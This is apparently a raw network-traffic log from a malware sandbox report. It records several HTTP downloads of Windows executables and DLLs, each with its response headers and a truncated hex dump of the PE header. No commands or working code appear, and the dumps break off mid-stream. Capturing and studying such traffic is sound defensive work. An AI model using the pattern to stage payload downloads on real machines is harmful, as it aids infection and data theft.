Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 30 Sep 2024 11:59:28 GMTContent-Type: application/octet-streamContent-Length: 257872Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-3ef50"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 30 Sep 2024 11:59:28 GMTContent-Type: application/octet-streamContent-Length: 80880Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-13bf0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 30 Sep 2024 11:59:29 GMTContent-Type: application/octet-streamContent-Length: 2046288Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-1f3950"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 30 Sep 2024 11:59:38 GMTContent-Type: application/octet-streamContent-Length: 380456Last-Modified: Mon, 30 Sep 2024 04:37:24 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fa2b04-5ce28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2f 28 fa 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 9e 05 00 00 08 00 00 00 00 00 00 4e bc 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 bc 05 00 4b 00 00 00 00 c0 05 00 f8 05 00 00 00 00 00 00 00 00 00 00 00 a8 05 00 28 26 00 00 00 e0 05 00 0c 00 00 00 c8 ba 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 9c 05 00 00 20 00 00 00 9e 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 05 00 00 00 c0 05 00 00 06 00 00 00 a0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 05 00 00 02 00 00 00 a6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 bc 05 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 aa 05 00 18 10 00 00 03 00 02 00 11 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 58 f1 31 35 d1 e9 51 1a 14 54 9d 77 7b a3 ef 8c 05 fa a9 ca 06 9a b3 9a d5 76 5e 00 22 df fa eb 06 53 a5 d7 8f ee b6 30 5a 6f bc ef 58 93 ac b7 96 f8 15 7c 83 a1 da 8c c7 f3 b1 bf 6f 88 94 d4 a0 41 53 b4 e8 44 a2 12 a6 6e f0 f4 45 0f 65 b6 f7 e2 35 5f f7 30 1b ba 95 ad ae 45 f9 84 06 03 41 aa 9a 85 ab b7 3b bb fa 01 0c 24 dc 33 a6 5a d8 ba 21 68 3b c7 25 16 bc 0f 0b 72 3b 47 0a 8c 75 18 13 f4 52 80 8b 07 24 27 b9 39 d0 b0 ce f2 c7 56 0b 8b 37 02 4f 3f 14 43 92 dd 3a fb 16 fd b4 7c e9 e5 cd 2c 60 32 76 71 85 32 74 be 58 2f 06 67 3d 5e 6e 28 14 ad dd b4 3f 25 4e 12 c8 d5 d4 67 c6 11 96 51 94 25 a2 25 e1 c9 af 49 72 6f 14 30 e1 06 88 48 09 66 d4 2e 77 2b 5e cf cc f7 63 c7 1d f7 69 9e d9 2f 86 27 c3 ae d5 e9 46 fb 7f fd a9 f0 1d c8 a2 cc 12 46 52 f1 45 fa 74 96 c1 05 9d 2b 76 9c 37 53 8d 67 aa ec 17 33 dc f6 ab 8e da 7d a5 28 c8 b8 c0 a7 48 a1 b2 ba 29 17 75 21 5f 35 fb b1 02 59 62 8e 0a 85 74 8
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 30 Sep 2024 11:59:39 GMTContent-Type: application/octet-streamContent-Length: 414248Last-Modified: Mon, 30 Sep 2024 04:37:16 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fa2afc-65228"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5c 28 fa 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 22 06 00 00 08 00 00 00 00 00 00 4e 40 06 00 00 20 00 00 00 60 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 40 06 00 4b 00 00 00 00 60 06 00 f8 05 00 00 00 00 00 00 00 00 00 00 00 2c 06 00 28 26 00 00 00 80 06 00 0c 00 00 00 c8 3e 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 20 06 00 00 20 00 00 00 22 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 05 00 00 00 60 06 00 00 06 00 00 00 24 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 06 00 00 02 00 00 00 2a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 40 06 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 2e 06 00 18 10 00 00 03 00 02 00 11 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b7 dc 3b 9f 38 e4 60 f0 c6 77 a2 a5 08 0f e5 a0 19 86 ff d4 8b 72 8b 62 1a 84 93 8a e4 20 c2 ed 43 04 47 41 ba f2 7e 7a 78 46 ae 63 c0 40 51 65 ff b9 38 88 d6 05 c1 93 38 24 d9 ec 61 f5 87 e5 87 93 4e f9 1d 21 51 1e 34 66 b5 13 c6 9a 5c 0e 84 ea 1a b4 64 df 14 61 ad 9e 65 39 34 05 db d7 5e 51 2a 38 66 a9 76 e5 02 07 e4 77 e3 57 1c c6 77 48 09 6b 51 f2 f1 1b 2c d2 db bd 33 c3 41 24 23 b9 e0 d8 50 16 8c 9c e2 87 b4 29 cf f4 53 d0 8b ee 6f 81 91 e8 62 2b 67 59 7f 5c 6f ae 8e b1 f0 d1 35 84 6d e5 29 ea 1d 32 1b 74 cc ab 35 d7 43 a6 c5 26 7a 37 ad 89 9d 1d 2d 8f 44 db 9e d9 c5 b8 71 21 11 b8 d6 8e 1f 8f 6f dc f4 e7 a3 b7 14 ba 07 84 d9 57 32 46 9c cb f4 6e 3b bb ee 7e 8a 39 2e 92 c7 e5 09 71 34 18 6c 9e 56 96 0f c6 4f 0c 70 18 6c dc f5 6d 7d e3 a0 27 d3 c4 cf 3a d1 97 45 b9 f6 cb bd e6 99 2f 25 32 ff fb b7 5f 01 c8 67 05 ca c0 3d 19 37 7f 0a d1 e8 96 f6 cf b7 fa 6d 8b 84 e8 d4 e2 1c dc b6 30 5e 87 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 30 Sep 2024 11:59:41 GMTContent-Type: application/octet-streamContent-Length: 334376Last-Modified: Mon, 30 Sep 2024 04:36:57 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fa2ae9-51a28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3f 28 fa 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 ea 04 00 00 08 00 00 00 00 00 00 4e 08 05 00 00 20 00 00 00 20 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 08 05 00 4b 00 00 00 00 20 05 00 f8 05 00 00 00 00 00 00 00 00 00 00 00 f4 04 00 28 26 00 00 00 40 05 00 0c 00 00 00 c8 06 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 e8 04 00 00 20 00 00 00 ea 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 05 00 00 00 20 05 00 00 06 00 00 00 ec 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 05 00 00 02 00 00 00 f2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 08 05 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 f6 04 00 18 10 00 00 03 00 02 00 11 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 da 74 4c 71 2d 7e ec c2 53 dd d7 be 49 a7 c5 39 c2 d8 0b 91 f5 80 f8 a6 ec c6 52 8c bf bc f6 e4 7b ec 64 a2 98 6c 6f f0 35 33 db 20 10 ee 42 c7 4c 66 f8 35 d2 a4 8e 07 62 23 e2 b0 38 46 c0 78 07 c7 69 a2 75 0e 75 65 cd 2b a8 c6 80 d1 ec 28 98 75 79 9f 71 9b ce 9f 7e 81 1a 8d 38 98 7d 23 80 83 9a 83 e5 78 96 52 4e e6 d9 4a b1 81 13 d3 9a 13 f6 d5 14 5f ea 6c 7e 88 a2 32 30 85 9d 8b f0 2c f9 5a ff 45 f9 85 86 dc 23 cd 94 18 e9 69 ce b0 dd c0 8c ef d1 77 e5 48 88 cb 1d f8 08 b0 93 0d 2a fe 0c de 2a 15 86 f0 44 fb c7 b0 a1 1c cd 46 63 0a 08 b7 f1 dc 2f f7 a1 7c 98 2a 1c 77 17 e6 fe f4 d2 6f f9 db 17 c3 32 d5 0d f2 4a b8 ec a1 3c 7f 93 41 28 97 d4 ed 66 83 52 6e da 4a aa 04 11 d4 4a 0f 35 83 a3 cb 3a a3 c2 c2 80 13 00 b2 ff 86 e1 75 e5 48 62 28 24 f2 47 a9 a6 47 09 78 e1 b7 78 21 ba 05 16 c5 4a 2c 98 c4 91 19 69 d1 11 34 ce 1f f6 a3 38 12 5c 47 f5 1f b8 0d eb d4 22 5b 78 1e de 64 f3 11 d8 ce 59 a4 9
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 11:59:44 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
